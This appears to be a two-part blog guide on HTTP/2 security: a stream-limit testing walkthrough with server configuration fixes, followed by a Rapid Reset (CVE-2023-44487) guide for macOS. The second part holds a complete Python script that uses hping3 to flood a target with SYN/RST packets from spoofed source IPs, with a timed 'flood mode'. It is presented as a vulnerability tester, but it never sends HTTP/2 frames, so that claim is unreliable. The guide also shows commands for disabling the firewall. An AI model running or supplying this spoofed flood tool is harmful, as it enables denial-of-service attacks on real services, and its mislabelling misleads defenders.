Server advertised limit: 128 concurrent streams

Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
  WARNING: 5 stream(s) were reset by server
  Stream limit enforcement detected

============================================================
STREAM LIMIT TEST RESULTS
============================================================

Server Configuration:
  Advertised max streams:  128

Test Statistics:
  Successful stream opens: 130
  Failed stream opens:     0
  Streams reset by server: 5
  Actual max achieved:     125
  Test duration:           3.45s

Enforcement:
  Stream limit enforcement: DETECTED

============================================================
ASSESSMENT
============================================================

Advertised limit (128) is within recommended range
Server actively enforces stream limits
  Stream limit protection is working correctly
============================================================

7. Interpreting Different Scenarios

7.1. Scenario 1: Proper Enforcement

Advertised max streams:  100
Successful stream opens: 105
Streams reset by server: 5
Actual max achieved:     100
Stream limit enforcement: DETECTED

Analysis: Server properly enforces the limit. Configuration is working exactly as expected.

7.2. Scenario 2: No Enforcement

Advertised max streams:  128
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server accepts far more streams than advertised. This is a potential vulnerability that should be investigated.

7.3. Scenario 3: No Advertised Limit

Advertised max streams:  Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.

7.4. Scenario 4: Conservative Limit

Advertised max streams:  50
Successful stream opens: 55
Streams reset by server: 5
Actual max achieved:     50
Stream limit enforcement: DETECTED

Analysis: Very conservative limit. Good for security but may impact performance for legitimate high-throughput applications.

8. Monitoring During Testing

8.1. Server Side Monitoring

While running tests, monitor your server for resource utilization and connection metrics.

Monitor connection states:

netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

Count active connections:

netstat -an | grep ESTABLISHED | wc -l

Count SYN_RECV connections:

netstat -an | grep SYN_RECV | wc -l

Monitor system resources:

top -l 1 | head -10

8.2. Web Server Specific Monitoring

For Nginx, watch active connections:

watch -n 1 'curl -s http://localhost/nginx_status | grep Active'

For Apache, monitor server status:

watch -n 1 'curl -s http://localhost/server-status | grep requests'

Check HTTP/2 connections:

netstat -an | grep :443 | grep ESTABLISHED | wc -l

Monitor stream counts (if your server exposes this metric):

curl -s http://localhost:9090/metrics | grep http2_streams

Monitor CPU and memory:

top -l 1 | grep -E "CPU|PhysMem"

Check file descriptors:

lsof -i :443 | wc -l

8.3. Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

8.4. Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

9. Remediation Steps

If your tests reveal issues, apply these configuration fixes:

9.1. Nginx Configuration

http {
    # Set conservative concurrent stream limit
    http2_max_concurrent_streams 100;

    # Additional protections
    http2_recv_timeout 10s;
    http2_idle_timeout 30s;
    http2_max_field_size 16k;
    http2_max_header_size 32k;
}

9.2. Apache Configuration

Set in httpd.conf or virtual host configuration:

# Set maximum concurrent streams
H2MaxSessionStreams 100

# Additional HTTP/2 settings
H2StreamTimeout 10
H2MinWorkers 10
H2MaxWorkers 150
H2StreamMaxMemSize 65536

9.3. HAProxy Configuration

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend fe_main
    bind :443 ssl crt /path/to/cert.pem alpn h2,http/1.1

    # Limit streams per connection
    http-request track-sc0 src table connection_limit
    http-request deny if { sc_conn_cur(0) gt 100 }

9.4. Envoy Configuration

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          http2_protocol_options:
            max_concurrent_streams: 100
            initial_stream_window_size: 65536
            initial_connection_window_size: 1048576

9.5. Caddy Configuration

example.com {
    encode gzip

    # HTTP/2 settings
    protocol {
        experimental_http3
        max_concurrent_streams 100
    }

    reverse_proxy localhost:8080
}

10. Combining with Rapid Reset Testing

You can use both the stream limit tester and the Rapid Reset tester together for comprehensive HTTP/2 security assessment:

# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com

# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 1000

# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com

11. Security Best Practices

11.1. Configuration Guidelines

  1. Set explicit limits: Never rely on default values
  2. Use conservative values: 100-128 streams is the recommended range
  3. Monitor enforcement: Regularly verify that limits are actually being enforced
  4. Document settings: Maintain records of your stream limit configuration
  5. Test after changes: Always test after configuration modifications

11.2. Defense in Depth

Stream limits should be one layer in a comprehensive security strategy:

  1. Stream limits: Prevent excessive concurrent streams per connection
  2. Connection limits: Limit total connections per IP address
  3. Request rate limiting: Throttle requests per second
  4. Resource quotas: Set memory and CPU limits
  5. WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation

11.3. Regular Testing Schedule

Establish a regular testing schedule:

  • Weekly: Automated basic stream limit tests
  • Monthly: Comprehensive security testing including Rapid Reset
  • After changes: Always test after configuration or infrastructure changes
  • Quarterly: Full security audit including penetration testing

12. Troubleshooting

12.1. Common Errors

Error: “SSL: CERTIFICATE_VERIFY_FAILED”

This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).

Error: “h2 library not installed”

Install the required library:

pip3 install h2 hyper --break-system-packages

Error: “Connection refused”

Verify the port is open:

telnet example.com 443

Check if HTTP/2 is enabled:

curl -I --http2 https://example.com

Error: “HTTP/2 not negotiated”

The server may not support HTTP/2. Verify with:

curl -I --http2 https://example.com | grep -i http/2

12.2. No Streams Being Reset

If streams are not being reset despite exceeding the advertised limit:

  • Server may not be enforcing limits properly
  • Configuration may not have been applied (restart required)
  • Server may be using a different enforcement mechanism
  • Limits may be set at a different layer (load balancer vs web server)

12.3. High Failure Rate

If many streams fail to open:

  • Network connectivity issues
  • Firewall blocking requests
  • Server resource exhaustion
  • Rate limiting triggering prematurely

13. Understanding the Attack Surface

When testing your infrastructure, consider all HTTP/2 endpoints:

  1. Web servers: Nginx, Apache, IIS
  2. Load balancers: HAProxy, Envoy, ALB
  3. API gateways: Kong, Tyk, AWS API Gateway
  4. CDN endpoints: CloudFlare, Fastly, Akamai
  5. Reverse proxies: Traefik, Caddy

13.1. Testing Strategy

Test at multiple layers:

# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com

# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com

# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com

14. Conclusion

Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:

  • Verify that your server advertises appropriate stream limits
  • Confirm that advertised limits are actually enforced
  • Identify misconfigurations before they can be exploited
  • Tune performance while maintaining security

Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.

15. Additional Resources


This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS

Introduction

In August 2023, a critical zero day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2 capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE 2023 44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR based source IP address spoofing capabilities.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;
# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10
# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider HTTP/2 Disabling (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'

#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: IP spoofing works reliably with hping3 across different network environments.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
